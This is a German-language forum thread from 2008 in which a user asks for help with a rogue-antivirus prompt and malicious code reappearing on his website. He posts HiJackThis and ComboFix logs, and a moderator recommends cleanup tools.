Home » Web Security für Webmaster » Schadcode auf Website » Themenansicht

Firefox Tipp: Instantfox - Quick Search Add-On!

Seite(n): 1

Antworten

Schadcode auf Website

16.06.2008, 12:21

zzi

Member

Beiträge: 31

#1 Hallo,

erhalte neuerdings beim browsen mit IE ständig eine meldung über "advancedxpdefender" der zu download der software auffordert.

Zudem fügt sich auf der eigenen Website (zinseszins.net) immer wieder von selbst Schadcode ein, der bei den Dateien am lokalen PC nicht zu finden ist.

Hier das LogFile:

Logfile of Trend Micro HiJackThis v2.0.2
Scan saved at 12:10:38, on 16.06.2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16674)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\Programme\Lavasoft\Ad-Aware\aawservice.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\CNYHKey.exe
C:\Programme\Google\Google Desktop Search\GoogleDesktop.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\Programme\Babylon\Babylon-Pro\Babylon.exe
C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe
C:\WINDOWS\system32\ctfmon.exe
C:\programme\deskcalc pro\deskcalc.exe
C:\Programme\Voipwise.com\Voipwise\Voipwise.exe
C:\Programme\Siber Systems\AI RoboForm\RoboTaskBarIcon.exe
C:\Programme\Microsoft Lernen und Wissen\Microsoft Encarta 2008 – Lernen und Wissen DVD\EDICT.EXE
D:\Programme\Sandboxie\SbieCtrl.exe
C:\Programme\Google\Google Desktop Search\GoogleDesktop.exe
C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe
C:\Programme\Windows Media Player\WMPNSCFG.exe
C:\Programme\FolderSize\FolderSizeSvc.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\inetsrv\inetinfo.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\Programme\Agnitum\Outpost Firewall\outpost.exe
D:\Programme\Sandboxie\SbieSvc.exe
C:\WINDOWS\system32\tcpsvcs.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Programme\Internet Explorer\iexplore.exe
C:\Programme\Adobe\Acrobat 7.0\Acrobat\Acrobat.exe
C:\DOKUME~1\Robert\LOKALE~1\Temp\Adobelm_Cleanup.0 001
C:\Programme\Gemeinsame Dateien\Adobe Systems Shared\Service\Adobelmsvc.exe
C:\DOKUME~1\Robert\LOKALE~1\Temp\Adobelm_Cleanup.0 001
C:\WINDOWS\system32\notepad.exe
C:\Programme\Trend Micro\HijackThis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.zinseszins.net
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http:**//www.zinseszins.net
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http**://www.zinseszins.net/
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programme\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: RealPlayer Download and Record Plugin for Internet Explorer - {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\Programme\Real\RealPlayer\rpbrowserrecordplugin .dll
O2 - BHO: (no name) - {724d43a9-0d85-11d4-9908-00400523e39a} - C:\Programme\Siber Systems\AI RoboForm\roboform.dll
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Programme\Microsoft Office\Office12\GrooveShellExtensions.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programme\Java\jre1.6.0_06\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\programme\google\googletoolbar3.dll
O2 - BHO: Adobe PDF Conversion Toolbar Helper - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Programme\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Programme\Google\GoogleToolbarNotifier\2.0.301. 7164\swg.dll
O2 - BHO: MegaIEMn - {bf00e119-21a3-4fd1-b178-3b8537e75c92} - C:\Programme\Megaupload\Mega Manager\MegaIEMn.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\programme\google\googletoolbar3.dll
O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Programme\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll
O3 - Toolbar: &RoboForm - {724d43a0-0d85-11d4-9908-00400523e39a} - C:\Programme\Siber Systems\AI RoboForm\roboform.dll
O4 - HKLM\..\Run: [ledpointer] CNYHKey.exe
O4 - HKLM\..\Run: [Google Desktop Search] "C:\Programme\Google\Google Desktop Search\GoogleDesktop.exe" /startup
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [OSSelectorReinstall] C:\Programme\Gemeinsame Dateien\Acronis\Acronis Disk Director\oss_reinstall.exe
O4 - HKLM\..\Run: [Babylon Client] C:\Programme\Babylon\Babylon-Pro\Babylon.exe -AutoStart
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [Outpost Firewall] C:\Programme\Agnitum\Outpost Firewall\outpost.exe /waitservice
O4 - HKLM\..\Run: [OutpostFeedBack] C:\Programme\Agnitum\Outpost Firewall\feedback.exe /dumps_startup
O4 - HKLM\..\Run: [egui] "C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe" /hide /waitservice
O4 - HKLM\..\Run: [QuickTime Task] "C:\Programme\QuickTime\qttask.exe" -atboottime
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [DeskCalc] "c:\programme\deskcalc pro\deskcalc.exe" /hide
O4 - HKCU\..\Run: [Voipwise] "C:\Programme\Voipwise.com\Voipwise\Voipwise.e xe" -nosplash -minimized
O4 - HKCU\..\Run: [RoboForm] "C:\Programme\Siber Systems\AI RoboForm\RoboTaskBarIcon.exe"
O4 - HKCU\..\Run: [L08DXLRD_20610375] "C:\Programme\Microsoft Lernen und Wissen\Microsoft Encarta 2008 – Lernen und Wissen DVD\EDICT.EXE" -m
O4 - HKCU\..\Run: [SandboxieControl] "D:\Programme\Sandboxie\SbieCtrl.exe"
O4 - HKCU\..\Run: [WMPNSCFG] C:\Programme\Windows Media Player\WMPNSCFG.exe
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'LOKALER DIENST')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'NETZWERKDIENST')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - Global Startup: Adobe Acrobat - Schnellstart.lnk = ?
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O8 - Extra context menu item: Ausgewählte Verknüpfungen in Adobe PDF konvertieren - res://C:\Programme\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
O8 - Extra context menu item: Ausgewählte Verknüpfungen in vorhandene PDF-Datei konvertieren - res://C:\Programme\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
O8 - Extra context menu item: Auswahl in Adobe PDF konvertieren - res://C:\Programme\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Auswahl in vorhandene PDF-Datei konvertieren - res://C:\Programme\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: In Adobe PDF konvertieren - res://C:\Programme\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: In vorhandene PDF-Datei konvertieren - res://C:\Programme\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Link mit Mega Manager herunterladen... - C:\Programme\Megaupload\Mega Manager\mm_file.htm
O8 - Extra context menu item: Mit dem LeechGet Wizard laden - file://C:\Programme\LeechGet 2007\\Wizard.html
O8 - Extra context menu item: Mit LeechGet herunterladen - file://C:\Programme\LeechGet 2007\\AddUrl.html
O8 - Extra context menu item: Mit LeechGet parsen - file://C:\Programme\LeechGet 2007\\Parser.html
O8 - Extra context menu item: Nach Microsoft E&xel exportieren - res://C:\PROGRA~1\MICROS~4\Office12\EXCEL.EXE/3000
O8 - Extra context menu item: RF - Formular ausfüllen - file://C:\Programme\Siber Systems\AI RoboForm\RoboFormComFillForms.html
O8 - Extra context menu item: RF - Formular speichern - file://C:\Programme\Siber Systems\AI RoboForm\RoboFormComSavePass.html
O8 - Extra context menu item: RF - Menü anpassen - file://C:\Programme\Siber Systems\AI RoboForm\RoboFormComCustomizeIEMenu.html
O8 - Extra context menu item: RF - Passwortgenerator - file://C:\Programme\Siber Systems\AI RoboForm\RoboFormComPasswordGenerator.html
O8 - Extra context menu item: RF - RoboForm-Leiste ein/aus - file://C:\Programme\Siber Systems\AI RoboForm\RoboFormComShowToolbar.html
O8 - Extra context menu item: Sothink SWF Catcher - C:\Programme\Gemeinsame Dateien\SourceTec\SWF Catcher\InternetExplorer.htm
O8 - Extra context menu item: Translate with &Babylon - res://C:\Programme\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll/Translate.htm
O8 - Extra context menu item: Verknüpfungsziel in Adobe PDF konvertieren - res://C:\Programme\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Verknüpfungsziel in vorhandene PDF-Datei konvertieren - res://C:\Programme\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.6.0_06\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Konsole - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.6.0_06\bin\ssv.dll
O9 - Extra button: An OneNote senden - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~4\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: An OneNote s&enden - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~4\Office12\ONBttnIE.dll
O9 - Extra button: (no name) - {2D663D1A-8670-49D9-A1A5-4C56B4E14E84} - (no file)
O9 - Extra button: Ausfüllen - {320AF880-6646-11D3-ABEE-C5DBF3571F46} - file://C:\Programme\Siber Systems\AI RoboForm\RoboFormComFillForms.html
O9 - Extra 'Tools' menuitem: RF - Formular ausfüllen - {320AF880-6646-11D3-ABEE-C5DBF3571F46} - file://C:\Programme\Siber Systems\AI RoboForm\RoboFormComFillForms.html
O9 - Extra button: Speichern - {320AF880-6646-11D3-ABEE-C5DBF3571F49} - file://C:\Programme\Siber Systems\AI RoboForm\RoboFormComSavePass.html
O9 - Extra 'Tools' menuitem: RF - Formular speichern - {320AF880-6646-11D3-ABEE-C5DBF3571F49} - file://C:\Programme\Siber Systems\AI RoboForm\RoboFormComSavePass.html
O9 - Extra button: Outpost Firewall Pro Quick Tune - {44627E97-789B-40d4-B5C2-58BD171129A1} - C:\Programme\Agnitum\Outpost Firewall\Plugins\BrowserBar\ie_bar.dll
O9 - Extra button: RoboForm - {724d43aa-0d85-11d4-9908-00400523e39a} - file://C:\Programme\Siber Systems\AI RoboForm\RoboFormComShowToolbar.html
O9 - Extra 'Tools' menuitem: RF - RoboForm-Leiste ein/aus - {724d43aa-0d85-11d4-9908-00400523e39a} - file://C:\Programme\Siber Systems\AI RoboForm\RoboFormComShowToolbar.html
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~4\Office12\REFIEBAR.DLL
O9 - Extra button: Encarta Suchleiste - {B205A35E-1FC4-4CE3-818B-899DBBB3388C} - C:\Programme\Gemeinsame Dateien\Microsoft Shared\Encarta Search Bar\ENCSBAR.DLL
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\system32\Shdocvw.dll
O9 - Extra button: Sothink SWF Catcher - {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - C:\Programme\Gemeinsame Dateien\SourceTec\SWF Catcher\InternetExplorer.htm
O9 - Extra 'Tools' menuitem: Sothink SWF Catcher - {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - C:\Programme\Gemeinsame Dateien\SourceTec\SWF Catcher\InternetExplorer.htm
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\WINDOWS\system32\shdocvw.dll
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\WINDOWS\system32\shdocvw.dll
O16 - DPF: {0EB0E74A-2A76-4AB3-A7FB-9BD8C29F7F75} (CKAVWebScan Object) - http://www.kaspersky.com/kos/eng/partner/default/kavwebscan_unicode.cab
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204
O16 - DPF: {3911F463-03E8-45A5-B7BE-A89E096ACB79} (ClientCheckX Control) - http://www.a-trust.at/html/ClientCheck/ClientCheckX.CAB
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1124708231312
O16 - DPF: {644E432F-49D3-41A1-8DD5-E099162EEEC5} (Symantec RuFSI Utility Class) - http://security.symantec.com/sscv6/SharedContent/common/bin/cabsa.cab
O16 - DPF: {67DABFBF-D0AB-41FA-9C46-CC0F21721616} (DivXBrowserPlugin Object) - http://download.divx.com/player/DivXBrowserPlugin.cab
O16 - DPF: {7B297BFD-85E4-4092-B2AF-16A91B2EA103} (WScanCtl Class) - http://www.ca.com/us/securityadvisor/virusinfo/webscan.cab
O16 - DPF: {B49C4597-8721-4789-9250-315DFBD9F525} (IWinAmpActiveX Class) - http://cdn.digitalcity.com/radio/ampx/ampx2.6.1.11_en_dl.cab
O16 - DPF: {E8304464-1EA9-4F39-A031-522874AAC230} (ESD Object) -
O16 - DPF: {E87F6C8E-16C0-11D3-BEF7-009027438003} (Persits Software XUpload) - http://upload.mediamax.com/Upload/XUpload.ocx
O16 - DPF: {FCF77DBD-0AE7-4EA8-B9EF-A733F6879B4E} (KardToolX Control) - http://www.a-trust.at/html/CardCheck/KardToolX.CAB
O17 - HKLM\System\CCS\Services\Tcpip\..\{941E4DE3-F3C6-43EA-9C10-603D3C0150BC}: NameServer = 195.34.133.21 195.34.133.22
O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Programme\Microsoft Office\Office12\GrooveSystemServices.dll
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\GEMEIN~1\Skype\SKYPE4~1.DLL
O20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLL
O22 - SharedTaskScheduler: IE Component Categories cache daemon - {553858A7-4922-4e7e-B1C1-97140C1C16EF} - C:\WINDOWS\system32\ieframe.dll
O23 - Service: Lavasoft Ad-Aware Service (aawservice) - Lavasoft - C:\Programme\Lavasoft\Ad-Aware\aawservice.exe
O23 - Service: Acronis Scheduler2 Service (AcrSch2Svc) - Acronis - C:\Programme\Gemeinsame Dateien\Acronis\Schedule2\schedul2.exe
O23 - Service: ActiveFax-Server-Dienst (ActiveFaxServiceNT) - ActFax Communication - C:\Programme\ActiveFax\Server\ActSrvNT.exe
O23 - Service: Adobe LM Service - Adobe Systems - C:\Programme\Gemeinsame Dateien\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: cyberJack PC/SC COM Service (cjpcsc) - REINER SCT - C:\WINDOWS\system32\cjpcsc.exe
O23 - Service: Eset HTTP Server (EhttpSrv) - ESET - C:\Programme\ESET\ESET NOD32 Antivirus\EHttpSrv.exe
O23 - Service: Eset Service (ekrn) - ESET - C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe
O23 - Service: Folder Size (FolderSize) - Brio - C:\Programme\FolderSize\FolderSizeSvc.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Programme\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Programme\Gemeinsame Dateien\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: IT Solution Signature Printer (ITSPrinterService) - IT Solution GmbH - C:\Programme\trustDesk\plugins\printer\itsprinters rv.exe
O23 - Service: Macromedia Licensing Service - Unknown owner - C:\Programme\Gemeinsame Dateien\Macromedia Shared\Service\Macromedia Licensing.exe
O23 - Service: MSSQLServerADHelper - Unknown owner - C:\Programme\Microsoft SQL Server\80\Tools\Binn\sqladhlp.exe (file missing)
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: O&O Defrag - O&O Software GmbH - C:\WINDOWS\system32\oodag.exe
O23 - Service: Outpost Firewall Service (OutpostFirewall) - Agnitum Ltd. - C:\Programme\Agnitum\Outpost Firewall\outpost.exe
O23 - Service: Private Folder Service (prfldsvc) - Unknown owner - C:\Programme\Microsoft Private Folder 1.0\PrfldSvc.exe
O23 - Service: Cyberlink RichVideo Service(CRVS) (RichVideo) - Unknown owner - C:\Programme\CyberLink\Shared Files\RichVideo.exe (file missing)
O23 - Service: Sandboxie Service (SbieSvc) - tzuk - D:\Programme\Sandboxie\SbieSvc.exe
O23 - Service: Streamload Service (StreamloadService) - Streamload - C:\Programme\Streamload\MediaMax XL\StreamloadService.exe
O23 - Service: trustLogon - IT Solution GmbH - C:\Programme\trustDesk\plugins\logon\trustlogon.ex e
O23 - Service: TuneUp WinStyler Theme Service (TUWinStylerThemeSvc) - Unknown owner - C:\Programme\TuneUp Utilities 2006\WinStylerThemeSvc.exe (file missing)
O23 - Service: Window Washer Engine (wwEngineSvc) - Webroot Software, Inc. - C:\Programme\Webroot\Washer\WasherSvc.exe
O24 - Desktop Component 0: My Current Home Page - http://www.8ung.at/zinseszins/images/mitte2.jpg

--
End of file - 16716 bytes

16.06.2008, 15:17

Swisstreasure

Moderator

Beiträge: 5694

#2 Hallo

1.
lösche mit cleaner die temp-Dateien
http://www.ccleaner.de/?protecus.de

2.
scannre mit rvaxo + poste den report
http://virus-protect.org/artikel/tools/rvaxo.html

3.
wende combofix an + warnmeldung wegklicken + poste den report
http://virus-protect.org/artikel/tools/combofix.html

4.
Scanne mit Counterspy + poste das Log
http://www.virus-protect.org/counterspy1.html

Sagt dir dieses Programm was?
C:\Programme\Voipwise.com\Voipwise\Voipwise.exe

Gruss Swiss

Dieser Beitrag wurde am 16.06.2008 um 15:23 Uhr von Tonstudio editiert.

16.06.2008, 18:03

zzi

Member

Themenstarter

Beiträge: 31

#3 ComboFix 08-06-15.4 - Robert 2008-06-16 16:02:05.7 - NTFSx86
Microsoft Windows XP Professional 5.1.2600.2.1252.43.1031.18.393 [GMT 2:00]
ausgeführt von:: C:\Download\ComboFix.exe
* Neuer Wiederherstellungspunkt wurde erstellt
* Resident AV is active

[color=red]WARNING -THIS MACHINE DOES NOT HAVE THE RECOVERY CONSOLE INSTALLED !![/color]
.

(((((((((((((((((((((((((((((((((((( Weitere L”schungen ))))))))))))))))))))))))))))))))))))))))))))))))
.

C:\WINDOWS\pskt.ini

.
((((((((((((((((((((((( Dateien erstellt von 2008-05-16 bis 2008-06-16 ))))))))))))))))))))))))))))))
.

2008-06-16 16:00 . 2008-06-16 16:10 <DIR> d-------- C:\RVAXO
2008-06-16 15:53 . 2008-06-16 16:01 117,950 --a------ C:\RVAXO.reg
2008-06-16 15:52 . 2008-05-29 21:30 828,824 --a------ C:\WINDOWS\system32\RVAXO.bat
2008-06-16 15:52 . 2001-10-01 14:51 69,632 --a------ C:\WINDOWS\system32\remove.exe
2008-06-16 14:09 . 2008-06-16 14:09 <DIR> d-------- C:\Programme\Acunetix
2008-06-16 14:07 . 2008-06-16 14:10 790 --a------ C:\WINDOWS\WVS_InstDBLogFile.csv
2008-06-16 14:07 . 2008-06-16 14:07 8 --a------ C:\WINDOWS\system32\ptl.dat.{F9EC52FA-7EC9-4CB0-AC04-73ECCDD900F5}
2008-06-16 12:50 . 2008-06-16 12:50 <DIR> d-------- C:\WINDOWS\LastGood.Tmp
2008-06-13 22:21 . 2008-06-13 22:23 <DIR> d-------- C:\WINDOWS\system32\Adobe
2008-06-13 21:27 . 2008-04-14 17:51 273,024 --------- C:\WINDOWS\system32\drivers\bthport.sys
2008-06-13 21:27 . 2008-04-14 17:51 273,024 -----c--- C:\WINDOWS\system32\dllcache\bthport.sys
2008-06-13 17:06 . 2008-06-13 17:06 <DIR> d-------- C:\Programme\Audiograbber
2008-06-06 12:53 . 2008-06-06 12:53 <DIR> d-------- C:\Programme\Microsoft Works
2008-06-06 11:53 . 2008-06-13 21:23 1,354 --a------ C:\WINDOWS\Sandboxie.ini
2008-06-06 11:27 . 2008-06-06 11:29 <DIR> d-------- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Lavasoft
2008-06-06 05:41 . 2008-06-06 11:28 <DIR> d-------- C:\Dokumente und Einstellungen\Robert\Anwendungsdaten\Lavasoft
2008-06-05 20:23 . 2008-06-06 11:28 <DIR> d-------- C:\Programme\Lavasoft
2008-06-05 20:15 . 2008-06-05 20:15 <DIR> d-------- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Prevx
2008-06-05 20:14 . 2008-06-06 07:48 <DIR> d-------- C:\Temp
2008-06-05 16:52 . 2008-06-05 16:52 <DIR> d-------- C:\WINDOWS\system32\Kaspersky Lab
2008-06-05 16:52 . 2008-06-05 16:52 <DIR> d-------- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Kaspersky Lab
2008-06-05 16:44 . 2008-06-05 20:09 <DIR> d-------- C:\Programme\Sandboxie
2008-06-03 10:44 . 2008-06-16 09:10 54,156 --ah----- C:\WINDOWS\QTFont.qfn
2008-06-03 10:44 . 2008-06-03 10:44 1,409 --a------ C:\WINDOWS\QTFont.for
2008-06-02 23:44 . 2008-06-02 23:44 <DIR> d-------- C:\WINDOWS\system32\ffdshow
2008-06-02 23:44 . 2006-03-11 04:56 438,272 --a------ C:\WINDOWS\system32\Mpeg2DecFilter.ax
2008-06-02 23:44 . 2006-03-11 04:48 434,176 --a------ C:\WINDOWS\system32\MatroskaSplitter.ax
2008-06-02 23:44 . 2007-03-28 11:27 364,544 --a------ C:\WINDOWS\system32\RealMediaSplitter.ax
2008-06-02 23:44 . 2005-07-10 02:12 241,664 --a------ C:\WINDOWS\system32\CoreVorbis.ax
2008-06-02 23:44 . 2004-08-18 00:04 217,088 --a------ C:\WINDOWS\system32\CoreFLACDecoder.ax
2008-06-02 23:44 . 2007-09-26 15:47 122,880 --a------ C:\WINDOWS\system32\stQTSource.ax
2008-06-02 22:45 . 2008-06-02 22:45 333 --a------ C:\WINDOWS\system32\temp_0000_85-30.aok
2008-06-02 22:44 . 2008-06-02 22:44 173 --a------ C:\WINDOWS\system32\test.aok
2008-05-30 14:54 . 2008-05-30 14:54 <DIR> d-------- C:\Programme\ActiveFax
2008-05-30 10:16 . 2008-05-30 14:54 435,392 --a------ C:\WINDOWS\system32\ActMonNT.dll
2008-05-30 10:16 . 2008-05-30 14:54 99,150 --a------ C:\WINDOWS\system32\ActMon32.hlp
2008-05-30 10:16 . 2008-05-30 14:54 90,112 --a------ C:\WINDOWS\system32\ActMonRe.dll
2008-05-30 10:16 . 2008-05-30 14:54 83,136 --a------ C:\WINDOWS\UIActFax.exe
2008-05-30 10:16 . 2008-05-30 14:54 69,632 --a------ C:\WINDOWS\UIActFax.dll
2008-05-30 10:16 . 2008-05-30 14:54 8,352 --a------ C:\WINDOWS\UIActFax.hlp
2008-05-30 10:16 . 2008-05-30 14:54 591 --a------ C:\WINDOWS\system32\ActMon32.cnt
2008-05-30 10:16 . 2008-05-30 14:54 136 --a------ C:\WINDOWS\UIActFax.cnt
2008-05-30 10:16 . 2008-05-30 14:54 69 --a------ C:\WINDOWS\system32\ActiveFax.Cmd
2008-05-26 16:38 . 2005-05-26 15:34 2,297,552 --a------ C:\WINDOWS\system32\d3dx9_26.dll
2008-05-25 16:30 . 2008-06-06 12:29 <DIR> d-------- C:\Dokumente und Einstellungen\Robert\Anwendungsdaten\Hide IP NG
2008-05-25 16:28 . 2008-05-25 16:29 <DIR> d-------- C:\Dokumente und Einstellungen\Robert\Anwendungsdaten\HideIP
2008-05-23 12:37 . 2008-05-23 12:37 <DIR> d-------- C:\Programme\Gemeinsame Dateien\xing shared
2008-05-22 22:16 . 2008-05-22 22:16 <DIR> d-------- C:\Programme\MSXML 6.0
2008-05-21 12:30 . 2008-06-06 12:25 <DIR> d-------- C:\Programme\Panda Security
2008-05-20 18:17 . 2008-03-25 02:37 69,632 --a------ C:\WINDOWS\system32\javacpl.cpl
2008-05-20 18:16 . 2008-05-20 18:16 <DIR> d-------- C:\Programme\Gemeinsame Dateien\Java
2008-05-20 13:48 . 2008-05-20 13:48 3 --a------ C:\WINDOWS\system32\EUupdate.installed
2008-05-20 13:46 . 2006-12-04 01:34 1,698,048 --------- C:\WINDOWS\system32\XpsSvcs.dll
2008-05-20 13:46 . 2006-12-04 01:34 1,698,048 -----c--- C:\WINDOWS\system32\dllcache\XpsSvcs.dll
2008-05-20 13:46 . 2006-12-04 01:34 671,744 -----c--- C:\WINDOWS\system32\dllcache\PrintFilterPipelineSvc.exe
2008-05-20 13:46 . 2006-12-04 01:34 580,352 --------- C:\WINDOWS\system32\XPSSHHDR.dll
2008-05-20 13:46 . 2006-12-04 01:34 580,352 -----c--- C:\WINDOWS\system32\dllcache\XPSSHHDR.dll
2008-05-20 13:46 . 2006-12-04 01:34 124,416 --------- C:\WINDOWS\system32\prntvpt.dll
2008-05-20 13:46 . 2006-12-04 01:34 27,648 -----c--- C:\WINDOWS\system32\dllcache\FilterPipelinePrintProc.dll
2008-05-20 13:46 . 2006-12-04 01:34 14,048 --------- C:\WINDOWS\system32\spmsg2.dll
2008-05-20 13:41 . 2006-10-31 12:26 36,864 -----c--- C:\WINDOWS\system32\dllcache\hidclass.sys
2008-05-20 13:38 . 2006-10-23 13:14 143,488 -----c--- C:\WINDOWS\system32\dllcache\usbport.sys
2008-05-20 13:38 . 2006-11-08 10:51 62,336 --------- C:\WINDOWS\system32\drivers\rspndr.sys
2008-05-20 13:38 . 2006-10-23 13:14 59,264 -----c--- C:\WINDOWS\system32\dllcache\usbhub.sys
2008-05-20 13:38 . 2006-10-23 13:14 30,208 -----c--- C:\WINDOWS\system32\dllcache\usbehci.sys
2008-05-20 13:38 . 2006-10-23 13:14 20,608 -----c--- C:\WINDOWS\system32\dllcache\usbuhci.sys
2008-05-20 13:38 . 2006-10-23 13:14 17,152 -----c--- C:\WINDOWS\system32\dllcache\usbohci.sys
2008-05-20 13:38 . 2006-11-08 10:51 10,752 --------- C:\WINDOWS\system32\rspndr.exe
2008-05-20 13:38 . 2008-05-20 13:38 3 --a------ C:\WINDOWS\system32\vbrun60sp6.installed
2008-05-20 13:36 . 2006-08-18 14:38 476,160 -----c--- C:\WINDOWS\system32\dllcache\wzcsvc.dll
2008-05-20 13:36 . 2006-08-18 14:38 52,736 -----c--- C:\WINDOWS\system32\dllcache\wzcsapi.dll
2008-05-20 13:36 . 2006-08-18 11:36 14,592 -----c--- C:\WINDOWS\system32\dllcache\ndisuio.sys
2008-05-20 13:32 . 2008-05-20 13:32 3 --a------ C:\WINDOWS\system32\Wordpad-Converter-ZLib-update.installed
2008-05-20 13:30 . 2008-05-20 13:30 <DIR> d-------- C:\WINDOWS\system32\de
2008-05-20 13:30 . 2006-01-09 15:11 397,312 --------- C:\WINDOWS\system32\mmcex.dll
2008-05-20 13:30 . 2006-01-10 01:10 184,320 --------- C:\WINDOWS\system32\microsoft.managementconsole.dll
